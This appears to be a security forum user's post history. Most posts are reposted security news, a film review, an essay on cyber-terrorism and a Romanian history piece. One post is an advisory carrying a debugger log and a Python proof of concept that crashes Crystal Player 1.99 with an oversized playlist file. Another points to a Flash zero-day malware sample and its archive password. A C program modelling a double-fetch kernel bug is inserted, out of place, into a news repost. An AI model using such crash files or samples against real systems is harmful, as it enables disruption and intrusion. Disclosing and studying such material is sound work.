Aerosol

Everything posted by Aerosol

  1. Millions of PSN gamers, who were hit by a massive data breach on Sony's Playstation network back in 2011, are finally being offered the opportunity to claim compensation from the company. Stateside victims of the hack attack – PSN, Qriocity and Sony Online Entertainment subscribers who held an account before 15 May 2011 – have been encouraged to file an online form as part of a settlement deal to end a class action lawsuit brought against the Japanese tech giant. A number of claims can be submitted by U.S. netizens affected by the assault on Sony's computer network systems. Victims can either claim one free game, up to three themes or a free subscription to Playstation Plus for three months for those subscribers not already signed up to that option, while those affected by identity theft can claim up to $2,500 in compensation. Sony, which offered a $15m settlement deal to PSN gamers in July last year, said: The proposed settlement offers payments equal to credit balances (if applicable credit balance is $2 or more) in inactive accounts, game and online service benefits for holders of active accounts, and reimbursements for certain out-of-pocket expenses from any identity theft proven to have resulted from the intrusions. In the UK, Sony was slapped with a £250,000 fine by the Information Commissioner's Office, after it concluded that the Data Protection Act had been violated following the 2011 hack attack. The personal info of millions of Brits – including names, addresses and account passwords – was stolen by malefactors who infiltrated Sony's PlayStation Network systems. In January 2013, Blighty's data cops concluded that the breach of around 77 million gamers could have been prevented if Sony had adequate security measures in place, such as hashing and salting log-ins and keeping system patches up to date. Despite that admonishment, Sony has refused to accept any responsibility for the attack. Source
  2. Telecoms security has been in and out of the headlines for almost two years now, ever since patriot/traitor/hero/villain (delete as your opinion dictates) Edward Snowden revealed the PRISM campaign and the rest in 2013. We've since learned that GCHQ has a pretty tight grip on the communications flowing around the UK and the rest of the world. So you'd think the folks at the top at GCHQ and the government would be adept at keeping their own comms secure. Not so, it seems. Sneak was amused to read that David Cameron received a prank phone call from someone who managed to bypass the switchboard security (the mind boggles as to how) and was given the mobile phone number of the head of GCHQ, Sir Robert Hannigan. Cameron explained that the hoax call took place while he was out for a walk, and was told, presumably by a government switchboard operator with a heavy case of 'Sunday afternoon lull', that he was being put into a conference call from Hannigan. Cameron, however, was not taken in and said he was immediately suspicious when the caller said sorry for 'waking him up' at the start of the call. Sneak knows politicians are often characterised as lazy, feckless types, but even he wouldn't have thought Cameron was in bed at 11am on a Sunday. "I thought that was strange as it was eleven o'clock in the morning," Cameron said, with James Bond-like calm. He then confirmed that he ended the call without revealing any national security information, such as Trident's tactical nuke launch codes, his inner thigh measurements or the location of the Holy Grail. Phew. Source
  3. I get into a game and that bad mood passes. I also watch various clips on YT or simply go to sleep.
  4. Update: OK Apple, your turn. After raising a ruckus with the disclosure of three unpatched Windows vulnerabilities, Google’s Project Zero research team did the same this week with a trio of security issues in Apple OS X. Project Zero imposes a 90-day deadline on vulnerabilities it reports to affected vendors; if a patch is not delivered inside that time frame, details are automatically made public via its external database. The respective OS X bugs were reported to Apple in late October and 90-day deadlines began expiring this week. The Project Zero disclosures also come with proof-of-concept exploit code. A request for comment from Apple was not returned in time for publication. Published reports indicate that the vulnerabilities have been patched in Yosemite 10.10.2, which is in beta. The vulnerabilities affect different components of Apple’s flagship operating system, and range from memory corruption to kernel code execution and a sandbox escape. All three require some kind of local access to exploit. The sandbox escape vulnerability, OS X networkd “effective_audit_token” XPC type confusion sandbox escape as labeled by Google, may have been mitigated starting in the Yosemite version of OS X. Google refers to a separate advisory for those details. In its disclosure on Tuesday, Google said that the networkd system daemon implements an XPC service API which communicates on behalf of an application. Project Zero said that XPC messages using get parameters are used without checking the type of the returned value. This allows messages to reach functions outside the sandbox, Google said. One day later, the 90-day deadline expired on an OS X IOKit kernel execution vulnerability. “Calling IOConnectMapMemory on userclient type 2 of “IntelAccelerator” with memory type 3 hits an exploitable kernel NULL pointer dereference calling a virtual function on an object at 0x0,” Google said in its advisory.
Part of this disclosure originally included a kernel ASLR bypass, but that was patched in Yosemite 10.10, Google said. The third disclosure happened yesterday and is another OS X IOKit kernel memory corruption vulnerability. Google said a Bluetooth device must be connected to exploit this bug, which is due to a bad bzero in IOBluetoothDevice. “Userspace can modify the size in shared memory leading to the bzero writing a controlled number of NULL bytes off the end of the buffer,” the advisory said. Project Zero’s automated disclosures are the latest salvo in the industry’s eternal debate over the sharing and distribution of vulnerability details. Microsoft fought back after Google spilled the beans on a trio of its unpatched bugs, one of which Google refused to sit on for an additional two days before Microsoft was to release a patch. Source
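As an added illustration (not code from Google's advisory or from IOBluetoothDevice), this C program models the bug class behind the Bluetooth bzero issue described above: a length that lives in memory userspace can rewrite is checked and then read again for the actual clear, so a write between the two reads defeats the check, while the hardened version copies the length once and bounds only that copy. CAPACITY, struct shared_region and the race_grow hook are constructed for this example.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Constructed model: a buffer whose length field is shared with userspace,
 * so it can change between the driver's validation and its use. */
#define CAPACITY 64

struct shared_region {
    volatile uint32_t len;      /* userspace can rewrite this at any moment */
    uint8_t data[CAPACITY];     /* fixed-size buffer the clear must stay inside */
};

/* Hook standing in for a concurrent userspace write to r->len. */
typedef void (*race_fn)(struct shared_region *r);

/* Double-fetch pattern: validates one read of len, then re-reads len for the
 * clear itself. Returns the byte count the clear would use (the write is not
 * performed, so an oversize count is reported instead of overflowing), or -1
 * if the check rejected the request. */
long clear_double_fetch(struct shared_region *r, race_fn race)
{
    if (r->len > CAPACITY)      /* first fetch: passes */
        return -1;
    if (race)
        race(r);                /* userspace bumps len after the check */
    return (long)r->len;        /* second fetch: the check is now stale */
}

/* Hardened pattern: copy len once, bound the copy, act only on the copy.
 * Performs the clear and returns the byte count used, or -1 if rejected. */
long clear_single_fetch(struct shared_region *r, race_fn race)
{
    uint32_t len = r->len;      /* the only read of the shared field */
    if (len > CAPACITY)
        return -1;
    if (race)
        race(r);                /* later changes to r->len cannot matter */
    memset(r->data, 0, len);    /* bounded by the validated local copy */
    return (long)len;
}

/* Simulated userspace write that enlarges the length after validation. */
void race_grow(struct shared_region *r)
{
    r->len = 4096;
}

int main(void)
{
    struct shared_region r;
    memset(&r, 0xAA, sizeof r);     /* fill so any clear is visible */
    r.len = 16;
    printf("double fetch would clear %ld bytes of a %d-byte buffer\n",
           clear_double_fetch(&r, race_grow), CAPACITY);
    r.len = 16;
    printf("single fetch cleared %ld bytes\n", clear_single_fetch(&r, race_grow));
    r.len = 4096;
    printf("oversize request result: %ld\n", clear_single_fetch(&r, NULL));
    return 0;
}
```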
  5. Several new versions of PHP have been released, fixing a number of security vulnerabilities and other bugs in the popular scripting language. PHP 5.6.5 is the newest version of the language, and it has patches for a handful of vulnerabilities, including a use-after-free flaw that could lead to remote code execution in some cases. “Sapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping’s length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping,” the description of the vulnerability says. There are a few other security vulnerabilities fixed in version 5.6.5, as well. One involves an initialized pointer in Exif. Another is a fix for a vulnerability that initially was patched in December. Apparently the patch did not completely fix the problem, which was identified by researcher Stefan Esser. The vulnerability is another use-after-free bug. “There is a small but important difference to the patch I sent on 10th December. You use zend_symtable_find instead of zend_hash_find from my patch. Because of this change the fix is incomplete. It now detects attacks that try to replace a key like “AAA”, but it does not fix attacks where the key is a numerical string like “123”. The reason for this is that we do not want integer keys in objects. That is why the code was added in the first place,” Esser said in an email to the PHP maintainers. “The object properties are therefore inserted via zend_hash_update, instead of zend_symtable_update. 
Therefore something like “123” will be inserted as a string and not as a numerical 123. On the attempt to do the overwrite attack you now check with zend_symtable_find(). This function will turn the “123” into a numerical “123” and therefore not see that it is already there. The protection will not be executed and therefore the attack works in the same way as before.” Source
  6. Spoiler alert: Those who haven’t yet seen the film, but plan to, please skip to the summary. Hollywood has tried to depict cyberwarfare and “hacking” many times. Hackers and The Net are just a couple of examples. Blackhat, a Michael Mann directed film, debuted in wide theatrical release on January 16th. Chris Hemsworth plays Nicholas Hathaway, a man who was serving time in prison for some sort of computer related crime. Viola Davis plays FBI Agent Carol Barrett. Leehom Wang plays Captain Dawai Chen, an officer of China’s cyberwarfare unit. Wei Tang plays his sister, Lien Chen. Lien’s character is central to the movie, she helps with the investigation and (spoiler alert!) falls in love with Nicholas. Here’s a quick synopsis. A nuclear power plant in Chai Wan, Hong Kong is attacked with a remote access tool (RAT.) Through the RAT, the plant’s programmable logic controllers are tampered with, causing the coolant pumps to overheat and explode. People within a ten kilometer radius of the plant are evacuated. Captain Dawai Chen has to find the culprit. He discovers, through his sister Lien and FBI Agent Carol Barrett, that the RAT contains code he wrote himself years ago, collaborating with Nicholas Hathaway. Nicholas was in prison, and Agent Barrett helped to release him, because of course, Nick’s help is crucial to the investigation. Coincidentally, the Mercantile Trade Exchange in Chicago is attacked with the same RAT, and soy prices skyrocket. It’s a commodities trading disaster! That incident makes the Chinese and American officials willing to collaborate. Our characters spend time in the US, travel to various locations in China, and eventually they travel to Malaysia and Indonesia as well. There’s lots of explosions, lots of super intense gunfire, one of the main characters is murdered while in his car, and of course, that explodes as well. I went into the movie theater with very low expectations for the film’s technical accuracy. 
Actually, Hollywood has done much worse when it comes to depicting cyberwarfare and information security attacks in general. There were highlights and lowlights. First, I’ll explain what I think the film got right.
Accuracies
It was quite correct to state that a RAT can be used to wreak havoc, such as causing a nuclear disaster. And malware has attacked nuclear facilities before, such as when Stuxnet hit Iran. Some of the GNU/Linux BASH shell commands were accurate. I saw a “sudo” here and there. It’s possible for the Chicago Mercantile Exchange to be attacked through a RAT. Yes, IPSes and firewalls are indeed network security devices. Kudos! Correct usage of the right kind of proxy servers can make tracing a blackhat’s activity a lot more difficult. What really impressed me was that at one point, someone filebound a keylogger to a PDF in order to acquire a password. The PDF was for the user to review their organization’s password policy when he was instructed to change his password. This was the very first time in American film and television that I’ve seen filebinding and software keylogging used properly, and the social engineering it may require to be successful. In NCIS and Hackers, they make it seem like “hacking” requires ultra fast typing. Supposedly, the way to “hack” or defend against a “hack” is to type at 327 words per minute! The faster the typing, the more hackerific the hacking! I didn’t see any of that BS in Blackhat. Very good. Now, here’s where Blackhat errs.
Inaccuracies
In the first scene that Chris Hemsworth’s Nicholas Hathaway appears in, he’s interrogated in prison about something he did. The interrogator says, “You used this to open a command line?” As if opening a command line on a machine is some super impressive, devious feat.
Notice that he didn’t say “acquire root access.” Just “open a command line.” Groan… Although this has nothing to do with information security, I noticed that Hong Kong and the Chinese cities in the movie were completely devoid of air pollution. Beijing and other Chinese cities are notorious for having horrific air quality, to the extent that it even interferes with landings and departures at Beijing’s international airport. Absolutely all of the code displayed in the movie was hexadecimal. Or random combinations of letters and numbers; sometimes it was difficult to tell. I highly doubt that the coders in the movie work purely in assembly. Especially when they develop applications like RATs. An NSA information security professional was extremely perplexed that his data center was penetrated, because they have firewalls and IPSes. Those things are bulletproof, don’t ya know? Likewise, checking physical security amounted to verifying that the door to the server room was protected by a fingerprint scanner, and that’s it. A monitoring device was put on Nick for his release. Fair enough. It was controlled by an Android app. One of the settings was for how frequently the app checked the geolocation of Nick’s monitoring device. Nick was able to grab the Android phone at one point and change its settings so that it checked his location a lot less frequently. Why would the backend of a convict’s monitoring device be so insecure, physically and otherwise? Apparently, you can do a “whois” on both usernames and IP addresses. That’s news to me. On a related note, once you’ve found an IP address, you’ve definitely got someone! It’s not like dynamic IP addresses and IP address spoofing exist, or anything like that. Also, that contradicts how the movie shows that proxy server use can make attackers more difficult to find. In one scene, Nick and Lien eat at a Korean restaurant that’s somewhere in the United States.
Hangul (Korean) characters can be seen here and there, but for some reason, there are Chinese characters to be seen as well. All that funny Asian writing is all the same, isn’t it? Anyway, at some point, Nick goes to the restaurant’s backroom, where there’s a PC with a couple of monitors. I could tell that Nick didn’t boot an OS from a USB stick or DVD. He didn’t use any external media, so he couldn’t have loaded applications from them either. A restaurant’s PC will typically have standard OS applications, financial software, and some sort of POS backend, without much else. I’d be surprised to find something like Wireshark or Nessus on a restaurant’s PC. Nonetheless, within mere seconds of acquiring physical access to the PC, Nick runs some pretty heavy duty network penetration tools. Black Widow is a fictional Nessus/OpenVAS-like program. Or perhaps it’s something like Kali Linux. It’s a super secret tool that only the FBI is supposed to have access to! As if these sorts of things are only developed by and used by the FBI! At one point, Nick and Lien are in the middle of a rural part of Malaysia. It’s really, really rural. There’s just a very tiny village there, and that’s it. Somehow, Lien is able to whip out her laptop and enjoy instant network connectivity. Maybe she’s using satellite technology, but that’s doubtful. FBI Agent Carol Barrett assures her colleagues that the Chinese can be trusted because “they’ve been cooperative so far.” I’ve written about Chinese cyber attacks on the United States before. Such incidents have been very frequent, and very recent. The movie takes place in March 2015. There was Operation Aurora in late 2009 that targeted Google and Adobe. The Office of the National Counterintelligence Executive reported Chinese cyber attacks on American military servers to Congress in November 2011. 
Backdoors have been found in devices sold to the United States and manufactured by Huawei and ZTE, both of which are closely tied to the Chinese government. That’s just the tip of the iceberg. The FBI should be well aware that collaborating with the Chinese to investigate cyberwarfare is a bad idea. There are probably intelligence types who laughed while watching this movie.
Summary
It’s obvious to me that some effort was made to make Blackhat technically accurate. But clearly, there were still blunders. As far as the American and Chinese collaboration in the film is concerned, I think that can be explained with three words: International box office. More and more, major Hollywood studios are relying on it to make movies that cost $70 to 150 million profitable. For instance, by Hollywood blockbuster standards, Pacific Rim didn’t do very well in the United States. But it ended up making a lot of money anyway, largely from Chinese moviegoers. Hollywood looks at China with dollar signs in her eyes. So, it was an absolute must that the Chinese government was depicted positively in the movie. Compared to previous attempts, Blackhat is an improvement in how information security and computer technology is portrayed in fiction. But it’s only a minor improvement. Source
  7. Yahoo XSS

    Congratulations @1488, let us know when you receive the reward!
  8. Stefan

    @wtf ) On:// Welcome!
  9. Hi and welcome!
  10. Malware don't need Coffee: Unpatched Vulnerability (0day) in Flash Player is being exploited by Angler EK Adobe Security Bulletin VirusTotal Scan: https://www.virustotal.com/en/file/f5458eb4b0d7c18519bbf5fd92437485bff31f9abc6870beb4e8dc327cd24192/analysis/1422090857/ Download Pass: infected Source
  11. I chose to post this because it concerns all of us! ======================================================= 24 JANUARY, the Little Union. 24 January is the date on which, every year since 1859, we celebrate a great event in the history of the Romanian people, namely the Union of the Principalities, known as the „Little Union”. The Union of the Principalities represents the unification of the old states of Moldavia and Wallachia (Țara Românească) and is closely tied to the personality of Alexandru Ioan Cuza and to his election as ruler of both principalities on 5 January 1859 in Moldavia and on 24 January 1859 in Wallachia. Still, the union was a complex process, based on the strong cultural and economic closeness between the two countries. The process began in 1848, with the establishment of the customs union between Moldavia and Wallachia, during the reigns of Mihail Sturdza and Gheorghe Bibescu respectively. The outcome of the Crimean War led to a European context favourable to achieving the union. The popular vote in favour of union in both countries, resulting from the Ad-hoc Assemblies of 1857, led to the Paris Convention of 1858, an agreement between the Great Powers accepting a largely formal union between the two countries, with different governments and some common institutions. At the start of the following year, the Moldavian unionist leader Alexandru Ioan Cuza was elected ruler of Moldavia and Wallachia, bringing them into a personal union. In 1862, with the help of the unionists of both countries, Cuza unified the Parliament and the Government, achieving political union. After his removal from power in 1866, the union was consolidated by bringing Prince Carol of Hohenzollern-Sigmaringen to the throne, and the constitution adopted that year named the new state Romania. International recognition of the Union. The historic act of 24 January 1859 represented the first step on the path to creating the unitary Romanian national state.
Imposed under strong popular pressure, particularly in Bucharest, the election of Alexandru Ioan Cuza as ruler of Wallachia would find full confirmation at the great demonstration occasioned by the arrival of the nation's chosen one in the Wallachian capital, writes juristpedia.ro. The most pressing problem was international recognition of the elections. The fait accompli of 24 January 1859 was regarded by the Porte and by Austria as a violation of the Paris Convention. The situation created in the two Principalities was, moreover, to be the subject of a new international Conference, which opened in Paris on 26 March/7 April and ran until 25 August/6 September. Special missions, led by people close to Alexandru Ioan Cuza, visited the capitals of the guarantor Great Powers and managed to win support for the Romanian cause. As early as the second session of the Conference (1/13 April), France, Russia, England, Prussia and Sardinia recognised the double election. The Ottoman Empire and Austria, however, stalled; moreover, it emerged that a military intervention across the Danube was being planned. Alexandru Ioan Cuza responded energetically. On 20 April, at Florești, between Ploiești and Câmpina, the Moldavian-Wallachian army was concentrated to face any situation. After further threats, under pressure from the other guarantor powers, the Porte officially accepted, together with Austria, at the 3rd session of the Paris Conference (25 August/7 September), to recognise the double election in its turn. The easing of tensions, both with the Ottoman Empire and with the Habsburg one, led the ruler to order the closure of the camp at Florești (1 September 1859). With recognition of the de facto situation imposed on 24 January thus achieved, the next immediate objective was acceptance by the guarantor powers of full Union. Without waiting for the verdict of other international meetings, Alexandru Ioan Cuza proceeded to unify the state apparatus, remedying as he went the consequences of the decisions adopted through the Paris Convention.
The Principalities' diplomatic missions in Constantinople were merged as early as 1859 (March), with Costache Negri recognised, even by the Porte, as the sole representative of both countries. Unification of the army began with movements of Moldavian military units to Bucharest and of Wallachian ones to Iași; the camp at Florești enjoyed a single command. During 1860, the general staffs, training, administration and quartermaster service were placed under a single authority, and the same person, General Ion Emanoil Florescu, was appointed minister of war in both countries. Cezar Librecht was appointed inspector general of the Moldavian and Wallachian telegraph service. At Focșani, not without difficulties, the Central Commission had begun its work, which, according to the Paris Convention, was to draft the laws common to both countries. In its three years of activity (1859-1862), of its drafts only those concerning the Court of Cassation and land ownership (which put into practice the principle of fiscal equality) were approved by the elective Assembly and promulgated by the ruler. The draft Constitution, however, was not approved by ruler Cuza, and the Central Commission in Focșani was abolished in February 1862. Relations with those guarantor powers that showed hostility to the union, or that had played an important role in the life of the Principalities in the past (Russia, in the years of the „protectorate”), were based, from the first years of Alexandru Ioan Cuza's reign, on undiminished respect for the autonomy of the newly constituted country.
Thus, the presence of Ottoman soldiers would be categorically forbidden, and the Porte would be obliged, in the summer of 1860, to give up the passports it required of Romanian travellers, subjects of the Empire having been detained in several instances for causing various disturbances. Austria, vehemently hostile, had to accept that the laws of the Romanian state also applied to imperial-royal subjects present here on business. Hungarians and Poles who wished to remain in the Principalities or to transit toward other regions were protected by the government and by the ruler in the spirit of the right to political asylum, even being offered the necessary means upon departure. France, then Russia, Italy and Prussia agreed to full union. Alexandru Ioan Cuza awaited the decision of the Constantinople Conference convened for this purpose. As expected, from its very first session the Porte demanded the right to intervene in the Principalities in the event of new violations of the Paris Convention, while Austria admitted the union only for the duration of Alexandru Ioan Cuza's reign. At the beginning of November 1861 the firman of the Union was presented, but under conditions considered unacceptable in the country. The firmness of Alexandru Ioan Cuza, the energetic reaction of the Chambers and of the governments, the intransigent stance of C. Negri and the favourable attitude of the majority of the guarantor Great Powers ultimately had their effect. At the end of the Conference, the Porte issued a new firman (4/16 December 1861) by which it gave up the conditions previously demanded, Austria keeping its old position. The series of reforms initiated by Cuza and the subsequent accession to the throne of the United Principalities of ruler Carol I, who enjoyed the support of both France and Prussia, made the act of 1859 irreversible. From 1866, according to the Constitution promulgated on 1 July, the United Principalities officially began to be called Romania. Source
  12. I don't think such a category has a place here; trolling shouldn't be encouraged.
  13. Document Title:
    ===============
    Crystal Player 1.99 - Memory Corruption Vulnerability

    Date:
    =============
    21/01/2015

    Vendor Homepage:
    ================
    http://www.crystalreality.com/

    Abstract Advisory Information:
    ==============================
    Memory Corruption Vulnerability in Crystal Player 1.99.

    Affected Product(s):
    ====================
    Crystal Player 1.99

    Exploitation Technique:
    =======================
    Local

    Severity Level:
    ===============
    Medium

    Technical Details & Description:
    ================================
    A Memory Corruption Vulnerability is detected in Crystal Player 1.99. An attacker can crash the software by using an .mls file. Attackers can crash the software locally through user interaction with an mls (playlist) file.

    --- DEBUG LOG ---
    ///registers
    EAX 00000000
    ECX 0006FE24
    EDX 0006FE24
    EBX 0013014C
    ESP 0006F300
    EBP 00060041
    ESI 00FF4A00
    EDI 00000001
    EIP 0040F933 Crystal.0040F933
    C 0 ES 0023 32bit 0(FFFFFFFF)
    P 1 CS 001B 32bit 0(FFFFFFFF)
    A 1 SS 0023 32bit 0(FFFFFFFF)
    Z 0 DS 0023 32bit 0(FFFFFFFF)
    S 1 FS 003B 32bit 7FFDE000(FFF)
    T 0 GS 0000 NULL
    D 0
    O 0 LastErr ERROR_NOT_ENOUGH_MEMORY (00000008)
    EFL 00010296 (NO,NB,NE,A,S,PE,L,LE)
    ST0 empty ST1 empty ST2 empty ST3 empty ST4 empty ST5 empty ST6 empty ST7 empty
    3 2 1 0 E S P U O Z D I
    FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
    FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1

    --- ERROR LOG ---
    Crystal+0xf933:
    0040f933 8b5510 mov edx,dword ptr [ebp+10h] ss:0023:00060051=????????
    00060051 doesn't exist in the program, aka not allowed, so memcopy fails...
    EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
    ExceptionAddress: 0040f933 (Crystal+0xf933)
    Access violation when reading [00060051]

    Proof of Concept (PoC):
    =======================
    This vulnerability can be exploited by local attackers with user interaction ...

    #!/usr/bin/python
    # Writes a 30000-byte playlist of "A" characters; loading it into the player
    # twice triggers the crash described above.
    buffer = "A" * 30000
    filename = "Crash" + ".mls"
    with open(filename, 'w') as f:
        f.write(buffer)
    print("[] Successfully MLS Created []")

    How to perform:
    =======================
    1) Open Immunity Debugger and attach Crystal Player 1.99
    2) Run it. Now move the .mls file generated by the python script above into the player
    3) Once again move the same file into Crystal Player 1.99 to add a second playlist.
    When you perform the above steps the application will crash. Analyze it in Immunity.

    Solution - Fix & Patch:
    =======================
    Restrict the maximum working size and set your own exception handling for over-sized requests.

    Security Risk:
    ==============
    The security risk of the vulnerability is estimated as medium because of the local crash method.

    Authors:
    ==================
    Kapil Soni (Haxinos)

    Source
  14. Introduction
The virtual space has over time become something of real importance for business, politics, work, communities and communications. In becoming gradually more and more dependent on and addicted to the Internet, individuals, companies, organizations and governments have raised (or are raising) awareness of being intimately vulnerable to attacks and threats of various types. Not only can the Internet potentially be used “as it is” to conduct offensive actions that are born and die in cyber-space, but it can also be a great way to conduct complementary or parallel actions to physical threats, such as, for example, ideological/religious propaganda and information gathering on sensitive targets. Analyzing terrorist actions conducted in the past, we saw a massive use of electronic means, and, in consideration of the fact that through such means one can ideally act “without territorial boundaries“, it is certainly possible to say that the Internet ties the terrorists together. Moreover, analysis of media seized in hot scenarios like Afghanistan, Syria and Iraq has brought to light real intelligence campaigns conducted through its use in the preparation of complex attacks. In addition, it is not difficult to imagine that even with not so high skills, the Internet can provide a good level of anonymity, control and coordination points, as well as a multitude of techniques for the exchange of sensitive information (steganography, encryption, encoding, word schemes, etc.). This article is intended to treat the generic elements of what is commonly called “cyber-terrorism” and the risks associated with the fact that today it really can occur.
Definition and Concepts
The term cyber-terrorism was first used by Barry Collin, a security researcher and an intelligence expert. He simply defined “cyber-terrorism” as the convergence of the terms “cybernetic” and “terrorism“.
Today, a definition popularly used to describe it is “the use of Internet and/or ICT networks against one or more critical national infrastructures (energy, transport, communications, military, economy, finance etc.) in order to hit or intimidate a society and its peoples causing casualties or injuries for ideological, political or religious reasons“. From this definition, cyber-terrorism can be considered in some ways along the lines of physical acts of terrorism, with which it shares some essential features. One of the keywords used in discriminating actions of cyber-terrorism from other types of similar actions in cyberspace is the “motivation” that pushes the attackers. An action with a clear political/ideological motivation or with obvious connotations related to religion is to be considered more likely an act of cyber-terrorism. The same type of action aimed at mere economic gain (through extortion or blackmail) would be more easily placed within the various layers of cybercrime (organized and not).
Networked Agents (they are online)
But how, commonly, are computing and multimedia resources currently used for pro-terrorism and/or pro-cyber-terrorism campaigns? Is it possible to identify key areas in which their greatest online efforts are now concentrated? One of these, among the most banal and obvious even though among the most disconcerting, is the “glorification of violence“. The glorification of violence and the push to emulate bloodthirsty acts is definitely one of the first goals for which the telematic medium is used today by terrorist groups. Beyond that, however, the Internet has become a great conduit for disseminating messages and resources targeted to the training of recruits and their indoctrination. In this regard, very particular attention must be given to social networks and sites devoted to meeting, such as chat rooms or forums. Another aspect certainly not to be underestimated is the so-called “online funding research“.
Recently it was discovered that some online donations to apparent benevolent institutions went instead to fund organizations in the Middle East led by terrorist groups. There’s also a very wide use of the Internet for the dissemination of material devoted to “digital training“. Audio, video, online manuals and web content are increasingly devoted to the self-made training of new recruits. It is pretty clear then that the potential of the digital world is endless when viewed under this light. Besides the activities described above, also to be taken into account are the benefits coming from the capabilities of “active” information gathering actions, which are not limited to passively seek information, but which aim to get it through campaigns of affiliate hacker groups. Thanks to them, in close relation to their capacity of course, it is easy to assume that the quantity and especially the accuracy of the information collected is certain to increase, thereby increasing the “value” (may be better… the dangerousness) of any terrorist group. If we also think of the increased capacity of securely sharing this information, things seem even more threatening. If, in fact, the attack of 11/09 has seen a design largely based on an exchange of emails totally “in clear”, the terrorist groups have over time developed means and tools that are much more sophisticated to ensure the confidentiality of their communications. One of the best known is certainly the “Mujahideen Secrets”, widely used by Al-Qaeda until 2007 for the protection of online and mobile communications. Recently, however, other software have been developed over this, especially after the “leak” of Edward Snowden of June 2013, such as “Tashfeer al-Jawwal“, a platform for the use of encryption developed by the “Global Islamic Media Front (GIMF)” or l “Amn al-Mujahid“, a software for the use of strong encryption developed by the “Al-Fajr Technical Committee“, an organization traditionally linked to Al-Qaeda. 
The cyber-space, therefore, appears tied hand in glove with each stratum of the organization of terrorist groups, and the Internet is the backbone of this dimension that today is so strong that it is difficult even only to imagine the presence or evolution of such organizations without it. The Risk Today The theme of the real risk today about cyber-terrorism is certainly due to disagreements in opinions among the experts. Of course, it is very easy to imagine that a government technologically abreast and in possession of specific “cyber-attack” units has on its side both the skills and the motivation to develop very effective digital weapons to be used against sensitive targets. But what could we say about the capabilities of cyber-terrorists in a cyber-war against an international community? According to the definition above, can we attribute such advanced capabilities in the digital world to such groups? Despite the rather simple fact to assume (or better, to recruit) an experienced hacker, or perhaps a group of them and rely on the support of affiliated “software house” (see sections above), this does not mean to pursue a program of “digital weaponry” comparable to that of some governments. How can we identify the notations a real program of cyber-sabotage? The variables involved in this case are many, but as an evaluation term, we can consider by a practical point of view a hypothetical cyber-attack against a target among the most desirable to the eyes of a cyber-terrorist: an electrical power plant. So, what would I need to complete a similar cyber-attack with a good chance of success? One of the first things to consider, according to common experience, is the assured presence of redundant systems in such infrastructures. An effective pure cyber-terrorist attack therefore should provide adequate coordination and probably the use of very sophisticated malware. 
In this regard, therefore, would be needed very high technical skills, good movement in the “underground” to get information about the software in use, weaknesses in the infrastructure, exploit codes, as well as a good availability of money. All this without considering that if we are going to work at certain levels, a proper hardware will be needed to ensure adequate computing power, storage space and fast lines. Another factor not to be underestimated is certainly the human one. In fact, it seems unlikely that experienced and highly trained ICT security specialists will enlist in the ranks of these organizations. And even if this were to happen, such individuals would face many problems related to their small number. It takes indeed long time in the development of dedicated malware to reach a good level of reliability in performing the operations expected, as well as to put together all the information about the more critical targets and their vulnerabilities. All this now seems beyond the means of even the largest and economically advantaged terrorist organization. In addition, if we make a comparison with the physical world, the operations in cyberspace, as well as being much more complex to organize, are also less spectacular in the mind of the community. Even talking about internal growth and “in house” training, it’s certainly much easier to instruct at the use of weapons compared to even a “basic” training in cyber-security. Conclusion Although considered potentially devastating and almost certainly with an influence on a rather extensive geographical area, today the probabilities of a pure cyber-terrorist attack are quite low in my opinion. For sure, this specific threat is more likely to be associated with hostile governments that own the means and the interests to develop high offense capabilities in the digital world. This obviously does not means that the threat of cyber-attacks sourcing from terrorists is absent. 
Most probably indeed it is to be expected that they will use them as a complement of physical terrorist actions in the near future. Imagine, for example, the consequences of a denial of service attack against the emergency systems after an explosion in a subway. They would be catastrophic. In addition we have to consider that the use of modern information technology, the development of software that is very effective in ensuring the confidentiality of communications, as well as hacking techniques used for collecting informations about targets and persons are gradually increasing between terrorist groups, raising exponentially their skills of organization, coordination and consequently, their dangerousness. Source
  15. Congratulations @Byte-ul, this way the users who were commenting nonsense on every post will disappear.
  16. Google, among several security organizations, recently announced a vulnerability in the SSL protocol, particularly SSL version 3. SSL is used to secure connections between a client and server to prevent eavesdropping and to ensure that the data has not been tampered with. SSLv3 is an old version of the SSL protocol, dating back to 1996, and debuted with Netscape Navigator. While a very old version of SSL, it is still widely supported by browsers and servers today. According to SSL Pulse, 98% of web servers supported SSLv3 in October 2014. Fortunately more secure replacements for SSLv3 have existed for a long time, such as TLS 1.0. Since TLS has been widely adopted for several years now, nearly all browsers will opt to use TLS instead of SSLv3.

The POODLE vulnerability is a flaw in the design of the algorithm, not a bug in a particular software implementation like Heartbleed. POODLE is similar to the BEAST attack, which targets SSLv3 and ciphers that use cipher block chaining (CBC). POODLE (Padding Oracle On Downgraded Legacy) targets users by being active on the network, similar to a man-in-the-middle attack. With the attacker having access to the network, he can force the SSL connection to the lower-grade protocol SSLv3 by interrupting the SSL handshake. Once the attacker has forced the connection to use SSLv3, he can attack the client and force characteristics of the connection that make it predictable. One way an attacker might accomplish this is with cross-site scripting, or XSS. If the attacker is successful, he will be able to steal sensitive information such as authentication cookies.

The simplest and most effective way to address this is to completely disable support for SSLv3. This is recommended for server administrators to ensure no clients connect to their resources using old versions of SSL. In another blog post we detailed how to lock down and remove older versions of SSL from the server. For desktop administrators, disable support for SSLv3 at the browser level. This can be accomplished with Group Policy for Internet Explorer. Since TLS is widely deployed, turning off SSLv3 support will have a small impact on most people. Internet Explorer 6 remains the only browser that does not support anything better than SSLv3. As support for SSLv3 is removed over the coming weeks, IE 6 users will have more difficulty using secure websites. IE 6 does support TLS 1.0, however it is off by default. Enabling TLS 1.0 in IE 6 can be used as a short-term workaround until a newer version of IE is installed.

Source
